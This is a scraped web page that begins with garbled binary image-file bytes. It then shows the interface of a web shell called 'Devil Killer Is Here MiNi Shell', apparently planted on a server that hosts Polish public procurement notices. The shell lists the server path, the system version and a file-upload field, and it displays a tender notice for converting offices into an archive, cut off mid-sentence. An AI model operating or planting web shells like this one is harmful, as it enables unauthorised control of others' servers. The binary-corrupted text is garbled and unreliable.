JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220314/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220314/0008473203-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa części budynku biurowego i zmiana sposobu użytkowania pomieszczeń biurowych na pomieszczenia archiwum </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Agencja Mienia Wojskowego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011263946</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowowiejska 26A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-911</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp.lu@amw.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://amw.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie mieniem Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa części budynku biurowego i zmiana sposobu użytkowania pomieszczeń biurowych na pomieszczenia archiwum </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d6da50e3-99fd-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00084732</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001874/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.38 Wykonanie robót budowlanych w zakresie przystosowania pomieszczeń biurowych na archiwum zakładowe wraz z montażem regałów archiwalnych - Lublin ul. Łęczyńska 1 - OR Lublin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://amw.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone<br/>jestwjęzyku polskim.2. Komunikacja między Zamawiającym a Wykonawcami odbywa się<br/>wyłącznieprzyużyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za<br/>pośrednictwemelektronicznejplatformy zakupowej (dalej: „Platforma” lub „Platforma Zakupowa”)<br/>podadresem:https://amw.eb2b.com.pl, która spełnia wymagania opisane w art. 64 ustawy lub przy<br/>użyciupocztyelektronicznej (e-mail) na adres wskazany w Rozdziale I SWZ, za wyjątkiem<br/>przypadkówwskazanychw SWZ. Oferty oraz oświadczenia i dokumenty składane wraz z ofertą należy<br/>składać tylko i wyłącznie przy użyciu Platformy. Strona internetowa<br/>prowadzonegopostępowaniahttps://amw.eb2b.com.pl/open-auctions.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej:3.Wykonawca<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,musiposiadać konto<br/>na Platformie Zakupowej. Zarejestrowanie i utrzymywanie konta naPlatformieZakupowej oraz<br/>korzystanie z Platformy jest bezpłatne.4. Wymagania techniczne iorganizacyjnekorzystania z Platformy<br/>Zakupowej określa Regulamin Platformy Zakupowej (dostępnypod adreseminternetowym<br/>https://amw.eb2b.com.pl/cms/page/id/terms-and-conditions). Wykonawcaprzystępującdo postępowania<br/>o udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lublogując (wprzypadku posiadania<br/>konta w Platformie Zakupowej), akceptuje warunki korzystania zPlatformy,określone w Regulaminie<br/>oraz uznaje go za wiążący.5. Instrukcja korzystania z Platformy:1)wzakładce „Postępowania”, dalej<br/>„Lista postępowań otwartych” wykonawca wybieraniniejszepostępowanie o nr DZP-OL.<br/>2616.40.2022oraz korzystając z polecenia „Zgłoś się do udziału w postępowaniu” przechodzi<br/>odpowiednio do Formularza rejestracyjnego – w przypadku,kiedywykonawca nie posiada konta na Platformie, lub<br/>panelu logowania użytkownika do Systemu w przypadku posiadania konta na Platformie;2) po<br/>wypełnieniu formularza rejestracyjnegowykonawcaotrzymuje wiadomość elektroniczną (e-mail)<br/>informującą, że może dokonać pierwszegologowania doPlatformy. Rejestracja nowego konta podlega<br/>weryfikacji i akceptacji Operatora, któramoże potrwać do24h (8h roboczych).3) zgłoszenie do<br/>postępowania wymaga zalogowaniaWykonawcy do Platformy.Po wprowadzeniu danych użytkownika tj.<br/>adresu e-mail oraz hasłazgłoszenie jest automatycznieakceptowane przez Platformę;4) w zakładce<br/>„Załączniki”przedmiotowego postępowania dostępna jestdokumentacja postępowania (SWZ oraz<br/>pozostałedokumenty). Pobranie dokumentu następuje pokliknięciu na wybrany załącznik i wciśnięciu<br/>polecenia„Pobierz”. W celu pobrania wszystkichzałączników jednocześnie należy wybrać polecenie<br/>„Pobierzpaczkę”, a następnie „Pobierz wszystkiezałączniki organizatora”.5) Zakładka „Załączniki” służy<br/>równieżWykonawcom do złożenia oferty orazdokumentów lub oświadczeń składanych razem z ofertą.<br/>6) Zadatę wpływu oferty, wniosków,zawiadomień, dokumentów, oświadczeń oraz innych informacji<br/>przyjmujesię datę ich zamieszczeniana Platformie. 7) Zaleca się, aby Wykonawca na bieżąco<br/>śledził(sugerujemy codziennie) zmiany jakichw trakcie postępowania może dokonać Zamawiający.<br/>Zaleceniedotyczy również informacji jakieZamawiający kieruje do Wykonawców po zakończeniu<br/>składaniaofert.6. Niezbędne wymaganiasprzętowo-aplikacyjne umożliwiające pracę na Platformie:1)<br/>stały dostępdo sieci Internet ogwarantowanej przepustowości nie mniejszej niż 4/1 mb/s,2) komputer<br/>klasy PC lubMac, onastępującej konfiguracji: pamięć RAM min. 8 GB, procesor Intel IV 4GHz, jeden<br/>zsystemówoperacyjnych: MS Windows 7, Mac OS x 10.4, Linux, lub ich nowsze<br/>wersje,3)zainstalowana dowolnanajnowsza wersja przeglądarki internetowej; w przypadku Internet<br/>Explorerminimalnie wersja 11.0.4)włączona obsługa JavaScript,5) zainstalowany program<br/>obsługującystosowane przez wykonawcęformaty plików (np. Acrobat Reader dla plików w formacie<br/>.pdf).7.Wszelkie dokumenty, oświadczenia,informacje składane za pośrednictwem Platformy, należy<br/>wczytaćjako załączniki, według Instrukcjikorzystania z Platformy, dostępnej dla zalogowanych<br/>użytkowników wzakładce „Pomoc” –„Instrukcje”.8. Dokumenty elektroniczne, oświadczenia lub<br/>elektroniczne kopiedokumentów luboświadczeń składające się na ofertę (składane przez Wykonawcę<br/>do upływu terminuskładania ofert),przekazywane są na Platformę przy użyciu zakładki „Załączniki”.9.<br/>Dokumentyelektroniczne,oświadczenia, uzupełnienia, elektroniczne kopie dokumentów lub oświadczeń<br/>składaneprzezWykonawcę po terminie składania ofert (np. na wezwanie Zamawiającego), składane są<br/>na Platformę przy użyciu zakładki „Pytania/informacje” Dalszy ciąg w sekcji IX-Pozostałe informacje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust.1 i 2<br/>rozporządzeniaParlamentuEuropejskiego i Rady UE 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony<br/>osóbfizycznych w związkuz przetwarzaniem danych osobowych i w sprawie swobodnego przepływu<br/>takichdanych oraz uchyleniadyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danychDz.Urz.UEL119 z 04.05.2016, str.1),dalej RODO, informuję, że administratorem Pani/Pana danych<br/>osobowychjest że: administratoremPani/Pana danych osobowych jest Agencja Mienia Wojskowego z<br/>siedzibą przyul. Nowowiejskiej 26 A,00-911 WarszawaAdministrator wyznaczył Inspektorem Ochrony<br/>Danych, zktórym może się Pani/Pankontaktować w sprawach związanych z ochrona danych poprzez<br/>pocztęelektroniczną na adres:iod@amw.com.pl lub listownie na adres Agencji Mienia Wojskowego,<br/>ul.Nowowiejska 26A, 00-911Warszawa, z dopiskiem „Inspektor Ochrony Danych”;Pani/Pana<br/>daneosobowe przetwarzane będą napodstawie art. 6 ust.1 lit.c RODO w celu prowadzenia<br/>przedmiotowegopostępowania o udzieleniezamówienia publicznego oraz zawarcia umowy, a podstawą<br/>prawną ichprzetwarzania jest obowiązekprawny stosowania sformalizowanych procedur udzielania<br/>zamówieńpublicznych spoczywający naZamawiającym;Odbiorcami Pani/Pana danych osobowych<br/>będą osobylub podmioty, którymudostępniona zostanie dokumentacja postępowania w oparciu o art.18<br/>oraz art.74 ustawy Pzp; Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1ustawy Pzp,przez okres4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy;Obowiązekpodania przezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiemustawowymokreślonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu oudzieleniezamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawyPzp;Wodniesieniu do Pani/a danych osobowych decyzje nie będą podejmowane w<br/>sposóbzautomatyzowany,stosowanie do art. 22 RODO;Posiada Pan/i:•na podstawie art.15 RODO<br/>prawodostępu do danychosobowych Pani/a dotyczących;•na podstawie art.16 RODO prawo do<br/>sprostowanialub uzupełnieniaPani/Pana danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lubuzupełnienia niemoże skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznegoani zmianąpostanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie<br/>może naruszaćintegralnościprotokołu oraz jego załączników.•na podstawie art.18 RODO prawo<br/>żądania odadministratoraograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków,<br/>o którychmowa w art.18ust.2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma<br/>zastosowania wodniesieniu doprzechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lub wcelu ochronypraw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesupublicznego UniiEuropejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania<br/>danychosobowych doczasu zakończenia postępowania o udzielenie zamówienia.•prawo do wniesienia<br/>skargido PrezesaUrzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie<br/>danychosobowych Pani/adotyczących narusza przepisy RODO;Nie przysługuje Pani/u:•w związku z<br/>art.17ust.3 lit.b,d lub eRODO prawo do usunięcia danych osobowych;•prawo do przenoszenia<br/>danych osobowych, o którym mowa w art. 20 RODO;•na podstawie art.21 RODO prawo sprzeciwu,<br/>wobec przetwarzania danychosobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art.6 ust.1 lit.cRODO. Jednocześnie Zamawiający przypomina o ciążącym na Pani/u<br/>obowiązkuinformacyjnymwynikającym z art.14 RODO względem osób fizycznych, których dane<br/>przekazanezostanąZamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający<br/>pośredniopozyskaod wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co<br/>najmniej jedno z wyłączeń, o których mowa w art.14 ust.5 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani: na podstawie art.<br/>18RODOprawożądania od administratora ograniczenia przetwarzania danych<br/>osobowychzzastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo<br/>doograniczeniaprzetwarzanianie ma zastosowania w odniesieniu do przechowywania, w<br/>celuzapewnienia korzystaniaze środkówochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lubprawnej, lub z uwagi naważnewzględy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego, a także nieograniczaprzetwarzania danych osobowych do czasu<br/>zakończeniapostępowania o udzieleniezamówienia. Nieprzysługuje Pani/Panu: w<br/>związku z art. 17 ust. 3lit. b, d lub e RODO prawo dousunięcia danych osobowych;<br/>prawo do przenoszenia danychosobowych, o którym mowa w art.20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu,wobec przetwarzania danych osobowych,gdyż<br/>podstawą prawną przetwarzania Pani/Pana danychosobowych jest art. 6 ust. 1 lit. c<br/>RODO.10.JednocześnieZamawiający przypomina o ciążącym naPani/Panu obowiązku<br/>informacyjnymwynikającym z art. 14RODO względem osób fizycznych, którychdane przekazane<br/>zostanąZamawiającemu w związku zprowadzonym postępowaniem i któreZamawiający pośrednio<br/>pozyska odwykonawcy biorącego udziałw postępowaniu, chyba że mazastosowanie co najmniej jedno<br/>zwyłączeń, o których mowa w art. 14ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP-OL.2616.40.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: przebudowa części budynku biurowego i zmiana sposobu użytkowania pomieszczeń biurowych na pomieszczenia archiwum – dla zamierzenia „adaptacja istniejących pomieszczeń biurowych na archiwum zakładowe w budynku przy ul. Łęczyńskiej 1 w siedzibie Oddziału Regionalnego AMW w Lublinie.<br/>2. Adaptacja będzie polegać m.in. na wzmocnieniu stropu, montażu regałów przesuwnych, zapewnieniu odpowiednich warunków klimatycznych poprzez montaż szafy klimatyzacji precyzyjnej wraz z klimatyzatorami i wentylatorami, wymianie instalacji elektrycznej, przeciwpożarowej, przeciwporażeniowej i przeciwprzepięciowej na nową oraz pomalowaniu wszystkich pomieszczeń.<br/>3. Szczegółowy zakres robót stanowi załącznik w postaci przedmiarów robót, stanowiący załącznik nr 10 do SWZ, specyfikacja techniczna wykonania i odbioru robót stanowiąca załącznik nr 11 do SWZ , opis przedmiotu zamówienia (projekty oraz decyzja o pozwoleniu na budowę, opinie, uzgodnienia) stanowiący załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45262700-8 - Przebudowa budynków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium Cena ofertowa brutto za wykonanie zamówienia – parametr C Punkty w kryterium cena ofertowa brutto za wykonanie zamówienia zostaną przyznane w sposób następujący:<br/><br/>najniższa cena ofertowa brutto za wykonanie zamówienia <br/>C = ---------------------------------------------------------------------------------------x 60 <br/>cena ofertowa brutto za wykonanie zamówienia oferty ocenianej <br/>Wykonawca w tym kryterium może uzyskać maksymalnie 60 punktów.<br/>B Kryterium okres gwarancji – parametr G - zostaną przyznane wg poniższego zestawienia<br/> Maksymalną liczbę punktów – 40, otrzyma oferta w której Wykonawca wskaże okres udzielonej gwarancji w wymiarze 5 lat i więcej,<br/> liczbę punktów – 30, otrzyma oferta w której Wykonawca wskaże okres udzielonej gwarancji w wymiarze 4 lat,<br/> liczbę punktów – 20, otrzyma oferta w której Wykonawca wskaże okres udzielonej gwarancji w wymiarze 3 lat<br/> liczbę punktów – 0, otrzyma oferta w której Wykonawca wskaże okres udzielonej gwarancji w wymiarze 2 lat<br/>Wykonawca w tym kryterium może uzyskać maksymalnie 40 punktów.<br/>Wykonawców, którzy w ofercie wskażą okres gwarancji krótszy niż 2 lata otrzymają punktów oferty na podstawie art. 226 ust. 1 pkt 5) zostaną odrzucone.<br/>Jeżeli Wykonawca nie poda w formularzu ofertowym okresu gwarancji jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp<br/>W przypadku wskazania w Formularzu ofertowym okresu gwarancji dłuższego niż 5 lat, Zamawiający przyzna punkty w tym kryterium jak dla 5 lat.<br/><br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>S= C + G<br/>Maksymalna liczba punktów wynosi 100, przy założeniu, że 1 pkt. odpowiada 1 %.<br/>4. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Punkty uzyskane w powyższych kryteriach zostaną zsumowane. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej.<br/> dysponowania osobami zdolnymi do wykonania zamówienia:<br/>Wykonawca zobowiązany jest wykazać, że osoba/osoby, która/które będą uczestniczyć w realizacji zamówienia będą posiadały uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń<br/>Zamawiający dopuszcza także odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, w zakresie którego właściwy organ wydaje decyzję w sprawie uznania kwalifikacji zawodowych na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r., poz. 220).<br/>Wykonawca może, w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy 